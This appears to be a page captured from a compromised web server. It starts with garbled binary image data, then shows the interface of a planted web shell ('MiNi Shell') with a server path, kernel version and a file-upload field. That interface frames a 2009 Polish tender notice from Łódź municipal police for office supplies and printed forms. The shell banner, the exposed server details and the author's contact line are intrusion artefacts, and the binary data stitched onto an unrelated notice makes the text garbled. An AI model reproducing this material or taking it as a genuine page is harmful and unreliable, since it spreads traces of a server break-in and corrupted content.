JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090128/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090128/30069-N-2009.html

<p class="kh_header"><b>Łódź: Dostawa artykułów biurowych, druków i notatników służbowych</b><br>
<b>Numer ogłoszenia: 30069 - 2009; data zamieszczenia: 28.01.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Straż Miejska w Łodzi , ul. Kilińskiego 81, 90-119 Łódź, woj. łódzkie, tel. 0-42 2502232, faks 0-42 2502200.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.strazmiejska.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów biurowych, druków i notatników służbowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa artykułów biurowych, druków i notatników służbowych. Przedmiot zamówienia zostł podzielony na dwa zadania:
1) ZADANIE NR 1 - ARTYKUŁY BIUROWE:

1. Dziurkacz do 20 kartek z ogranicznikiem formatu	-60 szt.
2. Klipsy biurowe, 19 mm, 12 szt. w opakowaniu	- 50 op.
3. Klipsy biurowe, 32 mm, 12 szt. w opakowaniu	- 40 op.
4. Pinezki metalowe, 50 sztuk w opakowaniu	- 40 op.
5. Pinezki do tablic korkowych, kolorowe, 15 szt. w opakowaniu - 50 op.
6. Zszywacz do 30 kartek	- 60 szt.
7. Spinacz biurowy okrągły, 28 mm, 100 szt. w opakowaniu - 300 op.
8. Spinacz biurowy okrągły, 50 mm, 100 szt. w opakowaniu - 60 op.
9. Zszywki 24/6, do zszywania 30 kartek, 1000 szt. w opak. - 200 op.
10. Klej w sztyfcie, ok. 20 g, biały - 20 szt.
11. Klej w płynie, ok. 20 ml	- 80 szt.
12. Nożyk z wysuwanym, łamanym i wymiennym ostrzem o szer. 18 mm - 40 szt.
13. Ostrza do nożyka, szer. 18 mm - 30 szt.
14. Nożyczki 21 cm z ostrzem ze stali nierdzewnej, plastikowy uchwyt	 - 60 szt.
15. Rozszywasz uniwersalny - 40 szt.
16. Atrament, poj. 30 ml, kolor zielony, czarny, niebieski	- 40 szt.
17. Flamastry - kpl. 6 kolorów w etui - 50 szt.
18. Flamastry pojedyncze - kolor czarny, niebieski, czerwony, żółty - 300 szt.
19. Tusz do stempli gumowych i polimerowych, czerwony, czarny, niebieski 
poj. 30 ml	- 70 szt.
20. Cienkopis końcówka oprawiona w metal, grubość linii 0,4 mm, tusz czarny, niebieski, czerwony, zielony	- 800 szt.
21. Taśma klejąca, przeźroczysta, 18 mm x 20 m - 150 szt.
22. Podajnik biurowy do taśmy klejącej o wymiarach 18 mm x 20 mm - 50 szt.
23. Taśma pakowa brązowa samoprzylepna, 48 mm x 46 m - 30 szt.
24. Rolka do kalkulatora wym. 57 mm x 25 m	- 120 szt.
25. Taśma barwiąca do kalkulatora, czarno - czerwona, wym. 13 mm x 6 m - 20 szt.
26. Papier do faksu 216 x 30 x 1/2, 6 szt. w opakowaniu	 - 100 op.
27. Temperówka metalowa	- 100 szt.
28. Skorowidz, format A 4 - twarde okładki - 96 kartek - 20 szt.
29. Mata na biurko, wym. 65 x 50 cm, różne kolory	- 100 szt.
30. Litery i cyfry samoprzylepne w kolorze czarnym, wys. 10 mm, 
na arkuszu o formacie A4 - 20 ark.
31. Ołówek drewniany z gumką, twardość HB	- 300 szt.
32. Rysiki do ołówków automatycznych, grubość 0,5 mm,
twardość HB, 12 szt. w opakowaniu	 - 20 op.
33. Ołówek automatyczny, rysik o grubości 0,5 mm, twardość HB - 50 szt.
34. Zeszyt A 5 - 60 kart w kratkę, miękka oprawa	- 100 szt.
35. Zeszyt A 5 - 32 karty w kratkę, miękka oprawa	- 100 szt.
36. Zeszyt A 4 - 96 kart w kratkę, twarda oprawa	- 300 szt.
37. Blok biurowy, makulaturowy, format A 4,100 kartek w kratkę - 400 szt.
38. Ofertówka, przeźroczysta, sztywna, folia polipropylenowa, format A 4 - 500 szt.
39. Koszulka na dokumenty, format A 4, przeźroczysta, wzmocniony dziurkowany brzeg, folia polipropylenowa, 100 szt. w op. - 130 op.
40. Koszulka na dokumenty, format A5, przeźroczysta, wzmocniony dziurkowany brzeg, folia polipropylenowa, 100 szt. w opak. - 20 op.
41. Biuwar (planer) indywidualny, format A 2 (580 x 410 mm), ze zrywanymi kartami, klejony w bloki na podkładzie z tektury, grzbiet klejony wzdłuż dolnego boku, ilość kartek min. 40, kalendarz na 2009 r. i 2010 r., dni tygodnia z podziałem na godziny, po środku miejsce na notatki - 50 szt.
42. Segregator w formacie A4, szerokość grzbietu 75 mm., 
z mechanizmem dźwigniowym i kieszenią na etykietę opisową - 350 szt.
43. Segregator w formacie A4, szerokość grzbietu 50 mm. 
z mechanizmem dźwigniowym i kieszenią na etykietę opisową - 150 szt.
44. Segregator w formacie A5, szerokość grzbietu 70 mm. 
z mechanizmem dźwigniowym i kieszenią na etykietę opisową - 80 szt.
45. Teczka na akta osobowe z trzema przekładkami A, B i C, sztywna introligatorska oprawa, grzbiet min. 20 mm, format A 4, z trzema wąsami skoroszytowymi, kolor granatowy - 150 szt.
46. Wkłady do teczek na akta osobowe, typ A, format A 4, sztywny karton	- 150 szt.
47. Wkłady do teczek na akta osobowe, typ B, format A 4, sztywny karton	- 150 szt.
48. Wkłady do teczek na akta osobowe, typ C, format A 4, sztywny karton	- 150 szt.
49. Skoroszyt plastikowy, format A4, wykonany z miękkiej folii PCV, przeźroczysta przednia okładka, tylna okładka kolorowa, z wąsami skoroszytowymi 
i wysuwanym paskiem do opisu zawartości - 300 szt.
50. Skoroszyt plastikowy z perforacją do wpinania do segregatora, format A4, wykonany ze sztywnej folii PCV, przeźroczysta przednia okładka, tylna okładka kolorowa, z wąsami skoroszytowymi i wysuwanym paskiem do opisu zawartości -	300 szt.
51. Tacka na dokumenty, plastikowa, przeźroczysta, format A4	- 100 szt.
52. Teczka z białego kartonu o gramaturze 275 g, zamykana na gumkę, format A4	- 300 szt.
53. Teczka z białego kartonu o gramaturze 275 g, wiązana, format A4	- 300 szt.
54. Skoroszyt z białego kartonu o gramaturze 275 g, format A4	- 2000 szt.
55. Tablica korkowa w ramie drewnianej, rozmiar 60 cm x 90 cm	- 50 szt.
56. Grzbiety plastikowe do bindowania, średnica 5 mm, kolor czarny, 
100 szt. w opakowaniu.	- 2 op.
57. Grzbiety plastikowe do bindowania, średnica 6 mm, kolor czarny,
100 szt. w opakowaniu.	- 3 op.
58. Grzbiety plastikowe do bindowania, średnica 10 mm, kolor czarny,
100 sztuk w opakowaniu. - 2 op.
59. Grzbiety plastikowe do bindowania, średnica 12 mm, kolor czarny,
100 szt. w opakowaniu	- 2 op.
60. Grzbiety plastikowe do bindowania, średnica 16 mm, kolor czarny,
100 szt. w opakowaniu	- 2 op.
61. Grzbiety plastikowe do bindowania, średnica 20 mm, kolor czarny,
100 szt. w opakowaniu -1 op.
62. Grzbiety plastikowe do bindowania, średnica 24 mm, kolor czarny,
100 szt. w opakowaniu	- 1 op.
63. Folia przeźroczysta do bindowania, format A 4, 100 szt. w opakowaniu	- 5 op.
64. Karton do bindowania 270 g, skóropodobny, kolor czarny, format A 4 - 5 op.
65. Zakreślacz fluorescencyjny, kolor żółty, różowy, zielony, pomarańczowy	- 340 szt.
66. Długopis z wkładem metalowym, wielkopojemnym, niebieski tusz - 1000 szt.
67. Długopis na smyczy, niebieski tusz	- 20 szt.
68. Wkład do długopisu typu Zenith, metalowy, wielkopojemny, 
tusz niebieski i czarny -	1000 szt.
69. Długopis żelowy z wkładem wymiennym, tusz niebieski	- 100 szt.
70. Wkład do długopisu żelowego, tusz niebieski i czarny -	100 szt.
71. Teczka z klipsem, format A 4	- 50 szt.
72. Teczka z klipsem, format A 5	- 50 szt.
73. Linijka plastikowa, przeźroczysta, długość 30 cm - 100 szt.
74. Korektor w piórze płaskim, metalowa cieńkopisząca końcówka, 
poj. 12 ml.	- 200 szt.
75. Gumka do wycierania ołówka - 100 szt.
76. Kalka maszynowa a 100 szt. w op.	- 20 op.
77. Marker z tuszem olejowym, wodoodpornym, szybkoschnącym,
w kolorze czarnym, grubość linii pisania 2 mm - 20 szt.
78. Marker z tuszem olejowym, wodoodpornym, szybkoschnącym,
w kolorze białym, grubość linii pisania 2 mm - 20 szt.
79. Pisaki do płyt CD/DVD, z tuszem wodoodpornym, grubość linii pisania 0,4 mm, cztery kolory w komplecie (zielony, niebieski, czarny, czerwony) - 10 kpl
80. Kostka papierowa wym. 85 x 85 mm, klejona, kolor biały - 200 szt.
81. Pojemnik plastikowy na kostki papierowe, przeźroczysty, 
wym. 85 x 85 x 50 mm	- 50 szt.
82. Karteczki samoprzylepne, wym. 75 x 75 mm, 100 szt. w bloczku, różne kolory - 150 bl.
83. Plastelina 6 kolorów w opakowaniu	- 20 op.
84. Taśma klejąca (gęsia skórka)	- 10 szt.
85. Szpagat jutowy, gramatura 5 dkg -	3 szt.
86. Folia do laminarki, format A4 100 szt. w opakowaniu, grubość 100mic - 20 op.
87. Folia do laminarki, format A5 100 szt. w opakowaniu, grubość 100mic - 10 op.
88. Koperta z okienkiem, samoklejąca, wym. 110 x 220 mm, kolor biały	 - 25000 szt.
89. Koperta samoklejąca o wym 110 x 220 mm, kolor biały	- 3000 szt.
90. Koperta C6, samoklejąca, kolor biały	 - 5000 szt.
91. Koperta C6 z okienkiem, samoklejąca, kolor biały	 - 5000 szt.
92. Koperta C6, samoklejąca, kolor żółty, zielony - 300 szt.
93. Koperta C4, samoklejąca, kolor biały	 - 1000 szt.
94. Koperta C5, samoklejąca, kolor biały	 - 1000 szt.
95. Koperta na płyty CD / DVD, kolor biały - 50 szt.
96. Papier do drukowania, format A 4, 80 g/m2, białość CIE 146, 500 arkuszy w ryzie - 1500 ryz
97. Papier do drukowania, format A 4, 80 g/m2,  kolor żółty, pastelowy, ekri, 500 arkuszy w ryzie - 10 ryz
98. Papier do drukowania, format A 3, 80 g/m2, białość CIE 146, 500 arkuszy w ryzie - 5 ryz
99. Papier fotograficzny, gramatura 200 g/m2, 210x297 mm, matowy, do drukarek 
HP Color LaserJet, 100 arkuszy w opakowaniu	- 4 op.
100. Papier fotograficzny, gramatura 220 g/m2, 210x297 mm, błyszczący, do drukarek HP Color LaserJet, 100 arkuszy w opakowaniu - 4 op.
101. Papier fotograficzny, gramatura 160 g/m2, 210x297 mm, błyszczący, do drukarek HP Color LaserJet, dwustronna powłoka papieru, 100 arkuszy 
w opakowaniu - 4 op.
102. Papier satynowany, format A 4, 160 g/m2, do druku cyfrowego, 
250 arkuszy w ryzie - 6 ryz
103. Papier satynowany, format A 4, 200 g/m2, do druku cyfrowego, 
250 arkuszy w ryzie - 6 ryz
104. Wizytówki / 90 x 50 mm / białe na arkuszu o formacie A 4 o gramaturze 176 g/m2 z mikroperforacją, 20 arkuszy w ryzie po 10 wizytówek na arkuszu  - 20 ryz
105. Etykieta samoprzylepna, format A 4, do drukarek laserowych, atramentowych i kserokopiarek, 100 etykiet w opakowaniu - 2 op.
106. Papier ciągły do drukarek komputerowych 150 x 12 x 1+0 - 6 op.
107. Papier ciągły do drukarek komputerowych 150 x 12 x 1+1 - 4 op.
108. Papier ciągły do drukarek komputerowych 240 x 12 x 1+0 - 3 op.
109. Papier ciągły do drukarek komputerowych 240 x 12 x 1+2 - 6 op.
110. Papier ciągły do drukarek komputerowych 375 x 12 x 1+0 - 5 op.
111. Papier ciągły do drukarek komputerowych 375 x 12 x 1+1 - 5 op.
112. Płyta CD-R w technologii DataLife Extra Protection, 700 MB, 48x, slim - 200 szt.
113. Płyta DVD-R w technologii Advanced AZO+, 4,7 GB, 16x, slim - 200 szt.

2) ZADANIE NR 2 - DRUKI I NOTATNIKI SŁUŻBOWE: 

1. Księga inwentarzowa, format A 4, okładka wzmocniona płótnem, 100 kartek	 - 3 szt.
2. Księga środków trwałych, format A 4, 80 kartek - 3 szt.
3. Dziennik korespondencji w twardej oprawie, format A 4 - 80 szt.
4. Kartoteka magazynowa ilościowa, format A 5, sztywny karton - 200 szt.
5. Wywieszka magazynowa, format A 6, sztywny karton - 200 szt.
6. RW wielopozycyjne samokopiujące, format A 5, 80 kart w bloczku - 5 bl.
7. ZW samokopiujące, format A 5, 80 kart w bloczku	- 2 bl.
8. WZ samokopiujące, format ? A 4, 80 kartek w bloczku - 2 bl.
9. KP samokopiujące, format A 6, 80 kart w bloczku	- 10 bl.
10. KW samokopiujące, format A 6, 80 kart w bloczku	- 10 bl.
11. Raport kasowy samokopiujący, format A 4, 80 kart w bloczku	- 10 bl.
12. Polecenie księgowania, format A 5, 80 kart w bloczku - 10 bl.
13. Polecenie przelewu samokopiujące, format A 6, 80 kart w bloczku - 12 bl.
14. Zestawienie obrotów i sald, format ? A 4 - 10 szt.
15. Wniosek o zaliczkę, format A 6	- 5 bl.
16. Karta wynagrodzeń dla jednostek budżetowych, format A 4, sztywny karton -	200 szt.
17. Polecenie wyjazdu służbowego z rozliczeniem kosztów delegacji, 
format A 5, 40 kartek w bloczku - 5 bl.
18. Karta urlopowa, format 2/3 A 6, 40 kartek w bloczku - 60 bl.
19. Kartoteka ewidencji czasu pracy, sztywny karton, format A5	- 500 szt.
20. Karta obiegowa, format A 6, 40 kartek w bloczku	- 10 bl.
21. Zaświadczenie o zatrudnieniu, format A 6, 80 kartek w bloczku - 30 bl.
22. Wniosek o udzielenie pożyczki do KZP, format 2/3 A 5	- 5 szt.
23. Lista potrąceń w KZP, format A 5, 50 kart w bloczku - 5 bl.
24. Nota księgowa samokopiująca, format A 5, 80 kartek w bloczku - 10 bl.
25. Karta rejestracyjna, wzór załącznik nr 3 do Rozp. MSWiA z dn. 20.12.2002 r. w sprawie postępowania z kierowcami naruszającymi przepisy ruchu drogowego (Dz. U. z 2002 r. Nr 236, poz. 1998), format A 6, sztywny karton - 15000 szt.
26. Zezwolenie na odbiór pojazdu z parkingu strzeżonego - DRUK ŚCISŁEGO ZARACHOWANIA z numeracją (druk samokopiujący), wzór załącznik nr 2 do Rozp. MSWiA z dnia 2.08.2002 r. w sprawie usuwania pojazdów 
(Dz. U. z 2002 r., Nr 134, poz. 1133), format A 5, bloczek 50 x 2	- 10 bl.
27. Dyspozycja usunięcia pojazdu, wzór załącznik nr 1 do Rozp. MSWiA 
z dnia 2.08.2002 r.  w sprawie usuwania pojazdów (Dz. U. z 2002 r., 
Nr 134, poz. 1133), format A 5, bloczek 33 x 3	- 10 bl.
28. OT przyjęcie środka trwałego, format A 6, 40 kartek w bloczku - 5 bl.
29. LT likwidacja środka trwałego, format A 6, 40 kartek w bloczku - 5 bl.
30. Protokół ustalenia okoliczności i przyczyn wypadku przy pracy,
format A 4, 40 kartek w bloczku - 20 bl.
31. Karta drogowa dzienna Sm-101 z ponumerowanymi kartami, 100 szt. w bloczku - 150 bl.
32. Kartoteka Pu 2-31-5, format A 5, sztywny karton - 200 szt.
33. Karta kontowa, format A4, papier offsetowy, min. 80 kartek w bloku	- 50 szt.
34. Książka kontowa uniwersalna, format A4, papier offsetowy, 
blok min. 40 kartek - 5 szt.
35. Notatniki służbowe	- 2000 szt..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 22.90.00.00-9, 22.81.50.00-6, 30.19.70.00-6, 30.23.00.00-0, 30.23.40.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:
1) posiadają uprawnienia do wykonywania działalności w zakresie objętym niniejszą procedurą przetargową, 
2) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
3)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie przepisów art. 24 ust. 1 lub 2 Ustawy.
Ocena spełnienia warunków nastąpi na podstawie przedstawionych przez wykonawcę oświadczeń i dokumentów na zasadzie spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykonawcy ubiegający się o uzyskanie zamówienia składają wraz z ofertą następujące dokumenty i oświadczenia potwierdzające spełnianie warunków udziału w postępowaniu, tj.: 
1) oświadczenie o spełnieniu warunków udziału w postępowaniu,
2) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
3) aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków i opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert,
4) aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2 - 4 
składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a. nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b. nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne 
i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.strazmiejska.lodz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 90-119 Łódź, ul. Kilińskiego 81, pok. nr 25.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.02.2009 godzina 10:00, miejsce: 90-119 Łódź, ul. Kilińskiego 81,sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> DOSTAWA ARTYKUŁÓW BIUROWYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa artykułów biurowych w ilościach wskazanych w ogłoszeniu głównym.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.19.20.00-1, 30.19.70.00-6, 30.23.00.00-0, 30.23.40.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> DOSTAWA DRUKÓW I NOTATNIKÓW SŁUŻBOWYCH.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa druków i notatników służbowych w ilościach wskazanych w ogłoszeniu głównym.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.90.00.00-9, 22.81.50.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com